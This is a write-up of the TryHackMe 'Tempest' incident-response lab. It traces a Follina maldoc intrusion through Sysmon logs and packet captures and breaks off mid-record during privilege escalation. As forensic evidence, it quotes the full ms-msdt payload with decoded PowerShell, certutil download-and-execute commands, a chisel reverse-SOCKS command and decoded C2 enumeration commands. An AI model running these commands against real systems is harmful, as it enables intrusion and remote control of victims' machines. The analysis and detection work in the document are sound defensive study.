Tempest

You are tasked to conduct an investigation from a workstation affected by a full attack chain.

CONTEXT

I. Background

In this incident, you will act as an Incident Responder from an alert triaged by one of your Security Operations Center analysts. The analyst has confirmed that the alert has a CRITICAL severity that needs further investigation.

Challenge Link: TryHackMe - Tempest

II. Tools and Artifacts

Conversion of Log Files

Conversion of EVTX files to JSON using EvtxECmd:

PS> .\EvtxECmd\EvtxECmd.exe -f sysmon.evtx --json .\ --jsonf sysmon.json

  Metrics (including dropped events)
  Event ID        Count
  1               238
  2               2
  3               92 
  5               3
  8               3
  11              1,024
  12              186
  13              869
  15              6
  22              136

PS> .\EvtxECmd\EvtxECmd.exe -f windows.evtx --json .\ --jsonf windows.json

  Metrics (including dropped events)
  Event ID        Count
  1102            1
  4624            43
  4625            4
  4648            9
  4720            2
  4722            2
  4724            3
  4728            2
  4732            3
  4738            3
  4797            34
  4798            27
  4799            12
  5379            51
  5382            2

Protocol Hierarchy (pcap)

$ tshark -r capture.pcapng | sed -e 's/^[ ]*\w*\s*//g' | sed -E 's/\s{2,}/ /g' | cut -d' ' -f5 | sort | uniq -c | sort -bnr
  
  16305 TCP
   1883 TLSv1.2
   1709 HTTP
    734 WebSocket
    548 TLSv1.3
     21 TLSv1
     13 HTTP/XML
      6 SSL

ANALYSIS

I. Initial Access

MALICIOUS DOCUMENT

As reported by the SOC analyst, the intrusion started from a malicious document. In addition, the analyst compiled the essential information generated by the alert as listed below:

  • The malicious document has a .doc extension.

  • The user downloaded the malicious document via chrome.exe.

  • The malicious document then executed a chain of commands to attain code execution.

The maldoc was found to have been downloaded onto the workstation through the browser. This was confirmed from Sysmon file creation events (Event ID 11) whose source image is chrome.exe.

$ cat sysmon.json | grep EventId..11 | grep chrome.exe | grep ".doc" | jq -r '.Payload' | jq -r '[.EventData.Data[] | select(."@Name" | test("^Image|^TargetFilename|^CreationUtcTime"))] | to_entries | map({(.value."@Name"): (.value."#text")}) | .[0]*.[1]*.[2]'

  {
    "Image": "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe",
    "TargetFilename": "C:\\Users\\benimaru\\Downloads\\free_magicules.doc:Zone.Identifier",
    "CreationUtcTime": "2022-06-20 17:12:56.193"
  }

The TargetFilename above is the document's Zone.Identifier alternate data stream, the Mark-of-the-Web that Chrome writes alongside a downloaded file. The capture shows the file was downloaded from phishteam.xyz (167.71.199.191):

$ tshark -r capture.pcapng -Y "http" | grep free_magicules.doc

  1367  89.506977 192.168.254.107 → 167.71.199.191 HTTP 595 GET /02dcf07/free_magicules.doc HTTP/1.1
  
$ tshark -r capture.pcapng -Y 'frame matches "free_magicules.doc"' -T json | jq -r '.[]."_source".layers.http | with_entries(if (.key|test("http.*")) then ({key: .key, value: .value}) else empty end)'

  {
    "http.host": "phishteam.xyz",
    "http.request.line": "If-Modified-Since: Mon, 20 Jun 2022 16:01:32 GMT\r\n",
    "http.connection": "keep-alive",
    "http.user_agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36",
    "http.accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
    "http.accept_encoding": "gzip, deflate",
    "http.accept_language": "en-US,en;q=0.9",
    "http.request.full_uri": "http://phishteam.xyz/02dcf07/free_magicules.doc",
    "http.request": "1",
    "http.request_number": "1"
  }

The file, free_magicules.doc, was then opened via Microsoft Word (WINWORD.EXE):

$ cat sysmon.json | grep EventId..1, | grep free_magicules | jq -r '.Payload' | jq -r '[.EventData.Data[] | select(."@Name" | test("^Image|^CommandLine|^User|^Hashes|^(ParentP|P)rocessId|^UtcTime"))] | to_entries | map({(.value."@Name"): (.value."#text")}) | add'

  {
    "UtcTime": "2022-06-20 17:13:12.410",
    "ProcessId": "496",
    "Image": "C:\\Program Files (x86)\\Microsoft Office\\root\\Office16\\WINWORD.EXE",
    "CommandLine": "\"C:\\Program Files (x86)\\Microsoft Office\\Root\\Office16\\WINWORD.EXE\" /n \"C:\\Users\\benimaru\\Downloads\\free_magicules.doc\" /o \"\"",
    "User": "TEMPEST\\benimaru",
    "Hashes": "MD5=09B09DC651D921FE022B16C234E64A12,SHA256=E25F32401FD3D25958B8B99F280F0325B232E54F185CC5D6E0710923005AC64A,IMPHASH=744185317F5DAAFAEB367DDD2932CC02",
    "ParentProcessId": "6596"
  }

Spawning from the Microsoft Word process was an execution of msdt.exe which is highly indicative of the Follina 0-day exploit (CVE-2022-30190).

$ cat sysmon.json | grep EventId..1, | grep -i "id..496" | jq -r '.Payload' | jq -r '[.EventData.Data[] | select(."@Name" | test("^Image|^CommandLine|^User|^Hashes|^(ParentP|P)rocessId|^UtcTime"))] | to_entries | map({(.value."@Name"): (.value."#text")}) | add'

  {
    "UtcTime": "2022-06-20 17:13:35.180",
    "ProcessId": "4868",
    "Image": "C:\\Windows\\SysWOW64\\msdt.exe",
    "CommandLine": "C:\\Windows\\SysWOW64\\msdt.exe ms-msdt:/id PCWDiagnostic /skip force /param \"IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'UTF8.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'JGFwcD1bRW52aXJvbm1lbnRdOjpHZXRGb2xkZXJQYXRoKCdBcHBsaWNhdGlvbkRhdGEnKTtjZCAiJGFwcFxNaWNyb3NvZnRcV2luZG93c1xTdGFydCBNZW51XFByb2dyYW1zXFN0YXJ0dXAiOyBpd3IgaHR0cDovL3BoaXNodGVhbS54eXovMDJkY2YwNy91cGRhdGUuemlwIC1vdXRmaWxlIHVwZGF0ZS56aXA7IEV4cGFuZC1BcmNoaXZlIC5cdXBkYXRlLnppcCAtRGVzdGluYXRpb25QYXRoIC47IHJtIHVwZGF0ZS56aXA7Cg=='+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe\"",
    "User": "TEMPEST\\benimaru",
    "Hashes": "MD5=4EBC38519675FB0BA6915D0D8A7FCD01,SHA256=1BE8AFD2962596807611E6A8836952D6BBDC24BDE52A34905006FF78F1AD5D12,IMPHASH=AF42CCE29BF30BC07C0496AF0420FD91",
    "ParentProcessId": "496"
  }

Examining the CommandLine of the msdt.exe process, the Follina payload contains a base64-encoded PowerShell segment:

C:\Windows\SysWOW64\msdt.exe ms-msdt:/id PCWDiagnostic /skip force /param "IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'UTF8.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'JGFwcD1bRW52aXJvbm1lbnRdOjpHZXRGb2xkZXJQYXRoKCdBcHBsaWNhdGlvbkRhdGEnKTtjZCAiJGFwcFxNaWNyb3NvZnRcV2luZG93c1xTdGFydCBNZW51XFByb2dyYW1zXFN0YXJ0dXAiOyBpd3IgaHR0cDovL3BoaXNodGVhbS54eXovMDJkY2YwNy91cGRhdGUuemlwIC1vdXRmaWxlIHVwZGF0ZS56aXA7IEV4cGFuZC1BcmNoaXZlIC5cdXBkYXRlLnppcCAtRGVzdGluYXRpb25QYXRoIC47IHJtIHVwZGF0ZS56aXA7Cg=='+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe"

Decoded and reformatted, it reads as follows:

$app=[Environment]::GetFolderPath('ApplicationData');
cd "$app\Microsoft\Windows\Start Menu\Programs\Startup"; 
iwr http://phishteam.xyz/02dcf07/update.zip -outfile update.zip; 
Expand-Archive .\update.zip -DestinationPath .; 
rm update.zip;

The decoded payload changes into the user's Startup folder, downloads update.zip there, extracts the archive in place and deletes the zip. PowerShell running from the diagnostic context, together with sdiagnhost.exe (the troubleshooting host launched by msdt.exe) being the process that writes the file into the Startup folder, confirms abuse of the Follina exploit.

$ cat sysmon.json | grep EventId..11 | grep update.zip | jq -r '.Payload' | jq -r '[.EventData.Data[] | select(."@Name" | test("^Image|^TargetFilename|^CreationUtcTime"))] | to_entries | map({(.value."@Name"): (.value."#text")}) | add'   

  {
    "Image": "C:\\Windows\\SysWOW64\\sdiagnhost.exe",
    "TargetFilename": "C:\\Users\\benimaru\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\update.zip",
    "CreationUtcTime": "2022-06-20 17:13:37.822"
  }

STAGE 2 EXECUTION

Based on the initial findings, we discovered that there is a stage 2 execution:

  • The document has successfully executed an encoded base64 command.

  • Decoding this string reveals the exact command chain executed by the malicious document.

Because update.zip was dropped into the Startup folder, its contents would execute at the user's next logon. Logon activity of the compromised user (benimaru) was therefore reviewed and the processes spawned by winlogon.exe were traced.

$ cat sysmon.json | grep EventId..1, | grep -i "winlogon.exe" | grep benimaru | jq -r '.Payload' | jq -r '[.EventData.Data[] | select(."@Name" | test("^Image|^(ParentC|C)ommandLine|^User|^Hashes|^(ParentP|P)rocessId|^UtcTime"))] | to_entries | map({(.value."@Name"): (.value."#text")}) | add'

  {
    "UtcTime": "2022-06-20 17:12:24.262",
    "ProcessId": "5968",
    "Image": "C:\\Windows\\System32\\userinit.exe",
    "CommandLine": "C:\\Windows\\system32\\userinit.exe",
    "User": "TEMPEST\\benimaru",
    "Hashes": "MD5=BF8825D08BC235F0609CA8BBEF4E179C,SHA256=1FE7F7C59EC7EAA276739FA85F7DDA6136D81184E0AEB385B6AC9FEAAA8C4394,IMPHASH=8419D97ABDFEB6C320F0C39028647572",
    "ParentProcessId": "5612",
    "ParentCommandLine": "winlogon.exe"
  }
  {
    "UtcTime": "2022-06-20 17:14:50.535",
    "ProcessId": "3408",
    "Image": "C:\\Windows\\System32\\userinit.exe",
    "CommandLine": "C:\\Windows\\system32\\userinit.exe",
    "User": "TEMPEST\\benimaru",
    "Hashes": "MD5=BF8825D08BC235F0609CA8BBEF4E179C,SHA256=1FE7F7C59EC7EAA276739FA85F7DDA6136D81184E0AEB385B6AC9FEAAA8C4394,IMPHASH=8419D97ABDFEB6C320F0C39028647572",
    "ParentProcessId": "1396",
    "ParentCommandLine": "winlogon.exe"
  }

Tracing the process tree further, a PowerShell execution was found that downloads the stage 2 payload (first.exe).

$ cat sysmon.json | grep EventId..1, | grep -i "parent.*id..3408" | jq -r '.Payload' | jq -r '[.EventData.Data[] | select(."@Name" | test("^Image|^(ParentC|C)ommandLine|^User|^Hashes|^(ParentP|P)rocessId|^UtcTime"))] | to_entries | map({(.value."@Name"): (.value."#text")}) | add'

  {
    "UtcTime": "2022-06-20 17:14:50.606",
    "ProcessId": "5784",
    "Image": "C:\\Windows\\explorer.exe",
    "CommandLine": "C:\\Windows\\Explorer.EXE",
    "User": "TEMPEST\\benimaru",
    "Hashes": "MD5=2F62005FCEA7430BB871A56F7700F81C,SHA256=B759293373A11D1A972873A902BC64B2C9690AB947CE4A185CD047195521296D,IMPHASH=0B98A47B3DAF2EE45939EF2A0F188959",
    "ParentProcessId": "3408",
    "ParentCommandLine": "C:\\Windows\\system32\\userinit.exe"
  }
  
$ cat sysmon.json | grep EventId..1, | grep -i "parent.*id..5784" | jq -r '.Payload' | jq -r '[.EventData.Data[] | select(."@Name" | test("^Image|^(ParentC|C)ommandLine|^User|^Hashes|^(ParentP|P)rocessId|^UtcTime"))] | to_entries | map({(.value."@Name"): (.value."#text")}) | add'

  [..omitted..]
  {
    "UtcTime": "2022-06-20 17:15:10.547",
    "ProcessId": "9052",
    "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
    "CommandLine": "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -w hidden -noni certutil -urlcache -split -f 'http://phishteam.xyz/02dcf07/first.exe' C:\\Users\\Public\\Downloads\\first.exe; C:\\Users\\Public\\Downloads\\first.exe",
    "User": "TEMPEST\\benimaru",
    "Hashes": "MD5=7353F60B1739074EB17C5F4DDDEFE239,SHA256=DE96A6E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1B160AB32C,IMPHASH=741776AACCFC5B71FF59832DCDCACE0F",
    "ParentProcessId": "5784",
    "ParentCommandLine": "C:\\Windows\\Explorer.EXE"
  }

The command uses certutil.exe to download the payload into the Public Downloads folder and then executes it from there:

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -noni certutil -urlcache -split -f 'http://phishteam.xyz/02dcf07/first.exe' C:\Users\Public\Downloads\first.exe; C:\Users\Public\Downloads\first.exe

The logs shown below prove the successful download and execution of first.exe:

$ cat sysmon.json | grep EventId..11 | grep first.exe | jq -r '.Payload' | jq -r '[.EventData.Data[] | select(."@Name" | test("^Image|^TargetFilename|^CreationUtcTime|^UtcTime"))] | to_entries | map({(.value."@Name"): (.value."#text")}) | add'
  
  {
    "UtcTime": "2022-06-20 17:15:14.096",
    "Image": "C:\\Windows\\system32\\certutil.exe",
    "TargetFilename": "C:\\Users\\Public\\Downloads\\first.exe",
    "CreationUtcTime": "2022-06-20 14:29:54.049"
  }
  
$ cat sysmon.json | grep EventId..1, | grep benimaru | jq -r '.Payload' | jq -r '[.EventData.Data[] | select(."@Name" | test("^Image|^(ParentC|C)ommandLine|^User|^Hashes|^(ParentP|P)rocessId|^UtcTime"))] | to_entries | map({(.value."@Name"): (.value."#text")}) | add | select(.Image | test(".*first.exe"))'

  {
    "UtcTime": "2022-06-20 17:15:14.129",
    "ProcessId": "8948",
    "Image": "C:\\Users\\Public\\Downloads\\first.exe",
    "CommandLine": "\"C:\\Users\\Public\\Downloads\\first.exe\"",
    "User": "TEMPEST\\benimaru",
    "Hashes": "MD5=C9AA36F483B61CFA9758C44ACDB776AC,SHA256=CE278CA242AA2023A4FE04067B0A32FBD3CA1599746C160949868FFC7FC3D7D8,IMPHASH=468991D410EEFBCFB478FB910DDA2CE2",
    "ParentProcessId": "9052",
    "ParentCommandLine": "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -w hidden -noni certutil -urlcache -split -f 'http://phishteam.xyz/02dcf07/first.exe' C:\\Users\\Public\\Downloads\\first.exe; C:\\Users\\Public\\Downloads\\first.exe"
  }
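The grep-and-jq queries above reconstruct the process chain by hand, one ParentProcessId at a time. The added example below (written for this writeup, not part of the original analysis or of EvtxECmd) parses EvtxECmd's JSON lines, walks the chain from winlogon.exe down to ch.exe in one call, and encodes the Follina pattern from the Initial Access section (an Office process spawning msdt.exe with an ms-msdt: command line) as detection logic. The records are constructed to mirror the Event ID 1 entries quoted on this page; ParentImage is a real Sysmon field that the jq filters here did not select.

```python
import json


def _record(event_id, fields):
    """Build one EvtxECmd-style JSON line: the Sysmon body sits in "Payload"
    as a JSON string whose EventData.Data is a list of {"@Name", "#text"}."""
    data = [{"@Name": k, "#text": v} for k, v in fields.items()]
    return json.dumps({"EventId": event_id,
                       "Payload": json.dumps({"EventData": {"Data": data}})})


WINWORD = r"C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

# Constructed sample, modelled on the Event ID 1 records quoted in this
# writeup (PIDs, images and times match; command lines are abbreviated).
SAMPLE_LINES = [
    _record(1, {"UtcTime": "2022-06-20 17:13:12.410", "ProcessId": "496",
                "Image": WINWORD, "CommandLine": "WINWORD.EXE /n free_magicules.doc",
                "ParentProcessId": "6596", "ParentImage": r"C:\Windows\explorer.exe"}),
    _record(1, {"UtcTime": "2022-06-20 17:13:35.180", "ProcessId": "4868",
                "Image": r"C:\Windows\SysWOW64\msdt.exe",
                "CommandLine": r"C:\Windows\SysWOW64\msdt.exe ms-msdt:/id PCWDiagnostic /skip force",
                "ParentProcessId": "496", "ParentImage": WINWORD}),
    _record(1, {"UtcTime": "2022-06-20 17:14:50.535", "ProcessId": "3408",
                "Image": r"C:\Windows\System32\userinit.exe", "CommandLine": "userinit.exe",
                "ParentProcessId": "1396", "ParentImage": r"C:\Windows\System32\winlogon.exe"}),
    _record(1, {"UtcTime": "2022-06-20 17:14:50.606", "ProcessId": "5784",
                "Image": r"C:\Windows\explorer.exe", "CommandLine": "Explorer.EXE",
                "ParentProcessId": "3408", "ParentImage": r"C:\Windows\System32\userinit.exe"}),
    _record(1, {"UtcTime": "2022-06-20 17:15:10.547", "ProcessId": "9052",
                "Image": PS, "CommandLine": "powershell.exe -w hidden -noni certutil -urlcache ...",
                "ParentProcessId": "5784", "ParentImage": r"C:\Windows\explorer.exe"}),
    _record(1, {"UtcTime": "2022-06-20 17:15:14.129", "ProcessId": "8948",
                "Image": r"C:\Users\Public\Downloads\first.exe", "CommandLine": "first.exe",
                "ParentProcessId": "9052", "ParentImage": PS}),
    _record(1, {"UtcTime": "2022-06-20 17:18:48.723", "ProcessId": "7388",
                "Image": r"C:\Users\benimaru\Downloads\ch.exe",
                "CommandLine": "ch.exe client 167.71.199.191:8080 R:socks",
                "ParentProcessId": "8948", "ParentImage": r"C:\Users\Public\Downloads\first.exe"}),
    # constructed Event ID 3 record, to show that non-EID-1 events are ignored
    _record(3, {"UtcTime": "2022-06-20 17:15:20.000", "ProcessId": "8948",
                "Image": r"C:\Users\Public\Downloads\first.exe",
                "DestinationIp": "167.71.222.162", "DestinationPort": "80"}),
]


def basename(path):
    return path.rsplit("\\", 1)[-1]


def parse_sysmon(lines):
    """Flatten EvtxECmd JSON lines into dicts of Sysmon fields plus EventId."""
    events = []
    for line in lines:
        rec = json.loads(line)
        data = json.loads(rec["Payload"])["EventData"]["Data"]
        fields = {d["@Name"]: d["#text"] for d in data}
        fields["EventId"] = rec["EventId"]
        events.append(fields)
    return events


def ancestry(events, pid):
    """Walk ParentProcessId links through Event ID 1 records and return the
    chain of image basenames from the root down to `pid`.
    Caveat: PIDs are reused, so on real data key on ProcessGuid /
    ParentProcessGuid (both present in Sysmon Event ID 1) when available."""
    by_pid = {e["ProcessId"]: e for e in events if e["EventId"] == 1}
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        ev = by_pid[pid]
        chain.append(basename(ev["Image"]))
        pid = ev.get("ParentProcessId", "")
        if pid not in by_pid and ev.get("ParentImage"):
            # the root's own creation was not logged (e.g. winlogon.exe);
            # fall back to the ParentImage the child recorded
            chain.append(basename(ev["ParentImage"]))
    chain.reverse()
    return chain


OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}


def find_office_spawning_msdt(events):
    """Detection logic for the Follina pattern: an Office process spawning
    msdt.exe with the ms-msdt: URI scheme on its command line.
    Returns (UtcTime, ProcessId, parent image) per hit."""
    hits = []
    for ev in events:
        if ev["EventId"] != 1:
            continue
        child = basename(ev["Image"]).lower()
        parent = basename(ev.get("ParentImage", "")).lower()
        if (child == "msdt.exe" and parent in OFFICE_APPS
                and "ms-msdt:" in ev.get("CommandLine", "").lower()):
            hits.append((ev["UtcTime"], ev["ProcessId"], parent))
    return hits


EVENTS = parse_sysmon(SAMPLE_LINES)

if __name__ == "__main__":
    print(" -> ".join(ancestry(EVENTS, "7388")))
    for hit in find_office_spawning_msdt(EVENTS):
        print("Follina pattern:", hit)
```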

Sysmon network connection events (Event ID 3) show that the execution of first.exe creates a callback to resolvecyber.xyz (167.71.222.162) on port 80:

$ cat sysmon.json | grep EventId..3, | grep first.exe | jq -r '.Payload' | jq -r '[.EventData.Data[] | select(."@Name" | test("^Image|^U|^Source(Ip|Port)|^Destination(Ip|Port)"))] | to_entries | map({(.value."@Name"): (.value."#text")}) | add' | grep -E "Destination" | sort | uniq
  
  "DestinationIp": "167.71.222.162",
  "DestinationPort": "80",
  "DestinationPortName": "http"
  
$ tshark -r capture.pcapng -Y "ip.dst==167.71.222.162 and http" -T json | jq -r '.[]."_source".layers.http | with_entries(if (.key|test("http.host")) then ({key: .key, value: .value}) else empty end)' | grep http.host | uniq
  
  "http.host": "resolvecyber.xyz"
  "http.host": "resolvecyber.xyz:8080"

MALICIOUS DOCUMENT TRAFFIC

Based on the collected findings, we discovered that the attacker fetched the stage 2 payload remotely:

  • We discovered the Domain and IP invoked by the malicious document on Sysmon logs.

  • There is another domain and IP used by the stage 2 payload logged from the same data source.

Network traffic related to the execution of first.exe shows requests to the URI path /9ab62b5:

$ tshark -r capture.pcapng -Y "ip.dst==167.71.222.162 and http" | head -n 1
 
   5159 227.738875 192.168.254.107 → 167.71.222.162 HTTP 161 GET /9ab62b5 HTTP/1.1
   
$ tshark -r capture.pcapng -Y "frame.number==5159" -T json | jq -r '.[]."_source".layers.http | with_entries(if (.key|test("http.*")) then ({key: .key, value: .value}) else empty end)'

  {
    "http.host": "resolvecyber.xyz",
    "http.request.line": "user-agent: Nim httpclient/1.6.6\r\n",
    "http.connection": "Keep-Alive",
    "http.user_agent": "Nim httpclient/1.6.6",
    "http.request.full_uri": "http://resolvecyber.xyz/9ab62b5",
    "http.request": "1",
    "http.request_number": "1"
  }

Requests carrying a ?q= query parameter with base64-encoded payloads are also seen:

$ tshark -r capture.pcapng -Y "ip.dst==167.71.222.162 and http" -T fields -e http.request.uri

  /9ab62b5
  /9ab62b5?q=d2hvYW1pIC0gdGVtcGVzdFxiZW5pbWFydQ0K
  /9ab62b5
  /9ab62b5?q=cHdkIC0gDQpQYXRoICAgICAgICAgICAgICAgDQotLS0tICAgICAgICAgICAgICAgDQpDOlxXaW5kb3dzXHN5c3RlbTMyDQoNCg0K
  /9ab62b5
  [..omitted..]

II. Discovery

Based on the collected findings, we have discovered that the malicious binary continuously uses the C2 traffic:

  • We can easily decode the encoded string in the network traffic.

  • The traffic contains the command and output executed by the attacker.

HTTP requests with base64 encoded payloads were parsed and decoded using the following command:

$ for i in $(tshark -r capture.pcapng -Y '(ip.dst==167.71.222.162 and tcp.port eq 80) and frame contains "?q="' -T fields -e http.request.uri | cut -d'=' -f2-); do
> echo "$i" | base64 -d;
> done

The decoded traffic shows that the threat actor had achieved remote code execution (RCE) through a non-interactive HTTP-based shell, each request carrying a command and its output. Initial enumeration covered the current user context, existing user directories, and local users and administrators:

> whoami 

  tempest\benimaru
  
> pwd

  Path
  ----
  C:\Windows\system32

> dir C:\Users 

      Directory: C:\Users


  Mode                LastWriteTime         Length Name
  ----                -------------         ------ ----
  d-----        6/20/2022   9:06 PM                benimaru
  d-r---        6/20/2022   4:03 PM                Public
  d-----        6/20/2022  11:52 PM                rimuru

> net users 

  User accounts for \\TEMPEST

  -------------------------------------------------------------------------------
  Administrator            benimaru                 DefaultAccount
  Guest                    rimuru                   WDAGUtilityAccount
  The command completed successfully.


> net localgroup administrators

  Alias name     administrators
  Comment        Administrators have complete and unrestricted access to the computer/domain

  Members

  -------------------------------------------------------------------------------
  Administrator
  rimuru
  The command completed successfully.

> net user benimaru

  User name                    benimaru
  Full Name
  Comment
  User's comment
  Country/region code          000 (System Default)
  Account active               Yes
  Account expires              Never

  Password last set            6/20/2022 9:18:04 PM
  Password expires             Never
  Password changeable          6/20/2022 9:18:04 PM
  Password required            No
  User may change password     Yes

  Workstations allowed         All
  Logon script
  User profile
  Home directory
  Last logon                   6/21/2022 1:14:49 AM

  Logon hours allowed          All

  Local Group Memberships      *Remote Management Use*Users
  Global Group memberships     *None
  The command completed successfully.

Next, they began exploring the current user context's home directory:

> dir C:\Users\benimaru

        Directory: C:\Users\benimaru


  Mode                LastWriteTime         Length Name
  ----                -------------         ------ ----
  d-r---        6/20/2022   4:13 PM                3D Objects
  d-r---        6/20/2022   4:13 PM                Contacts
  d-r---        6/21/2022  12:27 AM                Desktop
  d-r---        6/20/2022   9:20 PM                Documents
  d-r---        6/21/2022   1:13 AM                Downloads
  d-r---        6/20/2022   4:13 PM                Favorites
  d-r---        6/20/2022   4:13 PM                Links
  d-r---        6/20/2022   4:13 PM                Music
  dar---        6/21/2022   1:15 AM                OneDrive
  d-r---        6/20/2022   4:13 PM                Pictures
  d-r---        6/20/2022   4:13 PM                Saved Games
  d-r---        6/20/2022   4:13 PM                Searches
  d-r---        6/20/2022   5:57 PM                Videos

> dir C:\Users\benimaru\documents 

> dir C:\users\benimaru\Desktop

      Directory: C:\users\benimaru\Desktop


  Mode                LastWriteTime         Length Name
  ----                -------------         ------ ----
  -a----        6/20/2022  11:34 PM            268 automation.ps1
  -a----        6/20/2022   4:13 PM           1446 Microsoft Edge.lnk
  
> cat C:\Users\Benimaru\Desktop\automation.ps1

The file automation.ps1 contains benimaru's credentials in plaintext:

$user = "TEMPEST\benimaru"
$pass = "infernotempest"

$securePassword = ConvertTo-SecureString $pass -AsPlainText -Force;
$credential = New-Object System.Management.Automation.PSCredential $user, $securePassword

## TODO: Automate easy tasks to hack working hours

Following the user enumeration, network-related information was gathered:

> netstat -ano -p tcp

  Active Connections

    Proto  Local Address          Foreign Address        State           PID
    TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       864
    TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
    TCP    0.0.0.0:5040           0.0.0.0:0              LISTENING       5508
    TCP    0.0.0.0:5357           0.0.0.0:0              LISTENING       4
    TCP    0.0.0.0:5985           0.0.0.0:0              LISTENING       4
    TCP    0.0.0.0:7680           0.0.0.0:0              LISTENING       4964
    TCP    0.0.0.0:47001          0.0.0.0:0              LISTENING       4
    TCP    0.0.0.0:49664          0.0.0.0:0              LISTENING       476
    TCP    0.0.0.0:49665          0.0.0.0:0              LISTENING       1212
    TCP    0.0.0.0:49666          0.0.0.0:0              LISTENING       1760
    TCP    0.0.0.0:49667          0.0.0.0:0              LISTENING       2424
    TCP    0.0.0.0:49671          0.0.0.0:0              LISTENING       624
    TCP    0.0.0.0:49676          0.0.0.0:0              LISTENING       608
    TCP    192.168.254.107:139    0.0.0.0:0              LISTENING       4
    TCP    192.168.254.107:51802  52.139.250.253:443     ESTABLISHED     3216
    TCP    192.168.254.107:51839  34.104.35.123:80       TIME_WAIT       0
    TCP    192.168.254.107:51858  104.101.22.128:80      TIME_WAIT       0
    TCP    192.168.254.107:51860  20.205.146.149:443     TIME_WAIT       0
    TCP    192.168.254.107:51861  204.79.197.200:443     ESTABLISHED     4352
    TCP    192.168.254.107:51871  20.190.144.169:443     TIME_WAIT       0
    TCP    192.168.254.107:51876  52.178.17.2:443        ESTABLISHED     4388
    TCP    192.168.254.107:51878  20.60.178.36:443       ESTABLISHED     4388
    TCP    192.168.254.107:51881  52.109.124.115:443     ESTABLISHED     4388
    TCP    192.168.254.107:51882  52.139.154.55:443      ESTABLISHED     4388
    TCP    192.168.254.107:51884  40.119.211.203:443     ESTABLISHED     4388
    TCP    192.168.254.107:51895  52.152.90.172:443      ESTABLISHED     5508
    TCP    192.168.254.107:51896  20.44.229.112:443      ESTABLISHED     8904

Finally, the threat actor downloaded chisel (a TCP tunnelling tool commonly used to expose a SOCKS proxy) onto the workstation:

> powershell iwr http://phishteam.xyz/02dcf07/ch.exe -outfile C:\Users\benimaru\Downloads\ch.exe

> dir C:\Users\benimaru\Downloads\ch.exe

      Directory: C:\Users\benimaru\Downloads


  Mode                LastWriteTime         Length Name
  ----                -------------         ------ ----
  -a----        6/21/2022   1:17 AM        8230912 ch.exe

A reverse socks proxy to 167.71.199.191:8080 was started:

$ cat sysmon.json | grep EventId..1, | grep benimaru | jq -r '.Payload' | jq -r '[.EventData.Data[] | select(."@Name" | test("^Image|^(ParentC|C)ommandLine|^User|^Hashes|^(ParentP|P)rocessId|^UtcTime"))] | to_entries | map({(.value."@Name"): (.value."#text")}) | add | select(.Image | test(".*ch.exe"))'

  {
    "UtcTime": "2022-06-20 17:18:48.723",
    "ProcessId": "7388",
    "Image": "C:\\Users\\benimaru\\Downloads\\ch.exe",
    "CommandLine": "\"C:\\Users\\benimaru\\Downloads\\ch.exe\" client 167.71.199.191:8080 R:socks",
    "User": "TEMPEST\\benimaru",
    "Hashes": "MD5=527C71C523D275C8367B67BBEBF48E9F,SHA256=8A99353662CCAE117D2BB22EFD8C43D7169060450BE413AF763E8AD7522D2451,IMPHASH=C7269D59926FA4252270F407E4DAB043",
    "ParentProcessId": "8948",
    "ParentCommandLine": "\"C:\\Users\\Public\\Downloads\\first.exe\""
  }

Because benimaru is a member of the Remote Management Users group and TCP port 5985 (WinRM) is listening on the workstation, the threat actor may have obtained remote access via WinRM, tunnelled through the reverse SOCKS proxy. The logs below show all network logons (LogonType 3) of the compromised user:

$ cat windows.json | grep -E 'EventId..4624' | grep 'benimaru' | grep -i "type 3" | jq -r '{LogonType: .PayloadData2, UserName: .PayloadData1, Time: .TimeCreated}'

  {
    "LogonType": "LogonType 3",
    "UserName": "Target: TEMPEST\\benimaru",
    "Time": "2022-06-20T17:19:05.7222347+00:00"
  }
  {
    "LogonType": "LogonType 3",
    "UserName": "Target: TEMPEST\\benimaru",
    "Time": "2022-06-20T17:20:06.2574361+00:00"
  }
  {
    "LogonType": "LogonType 3",
    "UserName": "Target: TEMPEST\\benimaru",
    "Time": "2022-06-20T17:21:05.5133859+00:00"
  }
  {
    "LogonType": "LogonType 3",
    "UserName": "Target: TEMPEST\\benimaru",
    "Time": "2022-06-20T17:21:33.8813884+00:00"
  }

III. Privilege Escalation

Based on the collected findings, the attacker gained a stable shell through a reverse socks proxy.

Subsequent executions appear in the Sysmon logs but have no corresponding plaintext C2 traffic in the capture, and their parent process is wsmprovhost.exe (the WinRM provider host). This supports the assumption that the threat actor established a stable shell via WinRM.

The first execution was enumeration of privileges for the current user context (benimaru):

{
  "UtcTime": "2022-06-20 17:19:16.266",
  "ProcessId": "2068",
  "Image": "C:\\Windows\\System32\\whoami.exe",
  "CommandLine": "\"C:\\Windows\\system32\\whoami.exe\" /priv",
  "User": "TEMPEST\\benimaru",
